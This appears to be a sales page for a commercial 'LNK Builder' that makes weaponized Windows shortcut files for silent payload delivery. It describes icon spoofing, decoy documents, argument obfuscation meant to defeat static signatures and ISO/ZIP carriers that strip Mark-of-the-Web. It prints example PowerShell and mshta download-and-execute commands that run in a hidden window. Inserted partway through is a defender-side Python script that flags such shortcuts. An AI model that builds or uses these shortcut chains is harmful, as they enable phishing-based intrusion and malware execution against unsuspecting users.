LNK
Windows Shortcut · LOLBin Abuse

LNK Builder.

.lnk

Constructs weaponized Windows Shortcut files that act as silent execution vectors. Instead of pointing at a direct executable, the shortcut invokes built-in Windows binaries (LOLBins) to download, decrypt, and launch your payload entirely in the background, while presenting any icon and any name you choose.

Activation: Single click
Compatibility: Win 7+
Visual Spoof: Custom icon
Static Surface: No PE

Overview

What is a weaponized LNK?

A Windows Shortcut (.lnk) is a structured binary file that tells explorer.exe what to launch when double-clicked. The format has dozens of fields — target path, command-line arguments, working directory, icon location, hotkey, and more — and Windows accepts very long, very flexible argument strings.

Exploit Builder abuses this flexibility. The generated .lnk targets a fully-trusted Windows binary (a LOLBin) such as powershell.exe, cmd.exe, mshta.exe, rundll32.exe, or conhost.exe, and passes a multi-stage argument chain that ultimately fetches and runs your payload. The shortcut itself contains no PE, no embedded executable — it's just text in a structured file.

  • Single double-click → silent execution, no UAC, no SmartScreen if delivered correctly
  • Custom icon (PNG/ICO) — pose as a PDF, DOCX, image, or folder
  • Argument string up to ~4 KB — plenty of room for staged decoders
  • Optional decoy file opened alongside execution
Execution Flow

How the builder works.

STEP 01

Provide Payload

URL or local embed. Either point to an HTTPS-hosted payload that the LOLBin chain fetches at click-time, or embed a small first-stage blob (script / shellcode) directly into the LNK argument string for fully-offline execution.

STEP 02

Pick LOLBin

Choose execution host: powershell.exe, mshta.exe, rundll32, cmd.exe + curl, or a chained variant.

STEP 03

Customize Display

Pick an icon, set the visible name, optional decoy file, hidden window flag, and working-directory spoof.

STEP 04

Build & Deliver

Output is a single .lnk. Pack inside an .iso, .zip, or .img for MotW-friendly delivery.

Technical Details

Under the hood.

Shell Link Binary Format

Exploit Builder writes a fully-spec-compliant SHELL_LINK structure (HeaderBlock, LinkTargetIDList, LinkInfo, StringData, ExtraData). Targets parse correctly across Windows 7 through 11 24H2.

LOLBin Targets

Pre-baked execution chains for: powershell.exe, pwsh.exe, cmd.exe, mshta.exe, rundll32.exe, regsvr32.exe, installutil, msbuild, and conhost.

Argument Obfuscation

Base64, hex, ROT, character-substitution, and FromBase64String+IEX chains. Variable-name randomization and whitespace padding to defeat static signatures.

Icon Spoofing

Embed any .ico or auto-extract icons from system DLLs (imageres.dll, shell32.dll) so the LNK looks like a folder, PDF, document, or image.

Decoy Document

Optional: drop & open a benign PDF/DOCX from the same archive so the user sees expected content while execution happens silently.

Hidden Window

Sets SW_HIDE so the LOLBin window never flashes. Combined with conhost --headless or PowerShell -WindowStyle Hidden for full silence.

lnk-arguments · simplified PowerShell variant
# Target: %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe
# Arguments (obfuscated, hidden window):
-W 1 -nop -ep bypass -c "$u='https://...';" + `
   "iex(New-Object Net.WebClient).DownloadString($u)"

# Or via mshta (no PowerShell ETW):
mshta.exe javascript:a=new ActiveXObject("WScript.Shell");
         a.Run("powershell -nop -w 1 -c iex(...)",0);close();
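
Added example, not part of the original page or of the product: defender-side triage of shortcut fields already extracted by an LNK parser, flagging the traits described above (LOLBin target, download and eval chains, hidden window, document-looking name). The record keys, rule names, the 260-character threshold and the sample records are assumptions constructed for this example.

```python
import ntpath
import re

# Execution hosts the page lists as shortcut targets (lower-case basenames).
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "installutil.exe", "msbuild.exe", "conhost.exe"}
# Argument traits the page describes; the regexes are approximations, not a grammar.
ARG_RULES = {
    "download_cradle": re.compile(r"downloadstring|net\.webclient|\bcurl\b", re.I),
    "inline_eval": re.compile(r"\biex\b|invoke-expression|frombase64string", re.I),
    "hidden_window": re.compile(r"(?<!\S)-w[a-z]*\s+(?:1|hidden)\b|--headless", re.I),
    "policy_bypass": re.compile(r"(?<!\S)-e[a-z]*\s+bypass\b", re.I),
    "script_protocol": re.compile(r"\b(?:javascript|vbscript):", re.I),
    "encoded_blob": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
    "whitespace_padding": re.compile(r"\s{20,}"),
}
DOC_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|png|jpe?g)$", re.I)

def triage_lnk(rec):
    """Return sorted finding names for one parsed-shortcut record (a dict)."""
    args = rec.get("arguments", "")
    findings = {name for name, rx in ARG_RULES.items() if rx.search(args)}
    if ntpath.basename(rec.get("target", "")).lower() in LOLBINS:
        findings.add("lolbin_target")
    if len(args) > 260:  # assumed threshold; ordinary shortcuts stay far below it
        findings.add("long_arguments")
    # MS-SHLLINK ShowCommand: 1 = normal, 3 = maximized, 7 = minimized/no focus.
    if rec.get("show_command", 1) not in (1, 3):
        findings.add("non_normal_window")
    stem = re.sub(r"\.lnk$", "", rec.get("name", ""), flags=re.I)
    if DOC_EXT.search(stem) and "lolbin_target" in findings:
        findings.add("document_masquerade")
    return sorted(findings)

def is_suspicious(rec):
    """A LOLBin target alone is common and benign; require a second trait."""
    found = triage_lnk(rec)
    return "lolbin_target" in found and len(found) >= 2

# Constructed sample records; the first mirrors the page's PowerShell snippet.
SAMPLES = [
    {"name": "Invoice_Q3.pdf.lnk", "show_command": 7,
     "target": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "arguments": "-W 1 -nop -ep bypass -c \"$u='https://example.invalid/s';"
                  "iex(New-Object Net.WebClient).DownloadString($u)\""},
    {"name": "Dev Prompt.lnk", "show_command": 1,
     "target": r"C:\Windows\System32\cmd.exe", "arguments": r"/k cd /d C:\src"},
]

if __name__ == "__main__":
    for rec in SAMPLES:
        print(rec["name"], is_suspicious(rec), triage_lnk(rec))
```

The second record shows why a LOLBin target by itself is not treated as a verdict: ordinary developer shortcuts to cmd.exe produce that single finding and stay below the threshold.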
Specifications

Module specs.

Output Format: Windows Shell Link (.lnk) per MS-SHLLINK spec
Delivery Mode: URL stager (LOLBin fetches at click) · Local embed (first-stage blob inside argument string)
OS Compatibility: Windows 7 / 8.1 / 10 / 11 (all builds incl. 24H2)
LOLBin Targets: powershell, pwsh, cmd, mshta, rundll32, regsvr32, installutil, msbuild
Argument Obfuscation: Base64 · Hex · ROT · char-substitution · variable randomization
Icon Sources: Custom .ico · embedded PNG · auto-extract from system DLLs
Window Style: Normal · Minimized · Hidden (SW_HIDE)
Decoy Support: Drop & open PDF / DOCX / image alongside execution
Recommended Carrier: .iso / .img / password-protected .zip (MotW-stripping)
Max Argument Length: ~4096 chars (Windows MAX_PATH × ~16 with override)

Use Cases

When to use LNK.

🎣

Phishing Lure

Authorized phishing simulations where the lure is a "document" — LNK with PDF icon inside an ISO is a classic vector worth testing against.

📡

Initial Access

Red team engagements needing a small, non-PE artifact that survives email gateways and executes via trusted LOLBins.

🔬

Detection Engineering

Generate samples to validate Sigma rules for suspicious LNK arguments, LOLBin parent-child chains, and Mark-of-the-Web bypasses.

🧪

Sandbox Testing

Tune EDR detonation environments by feeding them LNKs with varied LOLBin targets and obfuscation styles.

🎓

Awareness Training

Show users why a "PDF.lnk" inside a downloaded ZIP is dangerous — measurable click-through metrics.

🌐

APT Replay

Reproduce TTPs from APT29, Bumblebee, Emotet 2022+ resurgence, and other LNK-heavy campaigns for purple-team work.

Pricing

LNK Builder plans.

All tiers include unlimited builds, every LOLBin target, full obfuscation, and updates within the term.

Bundle option. Need multiple builders? The All Modules Bundle covers every builder + both launchers at a steep discount.
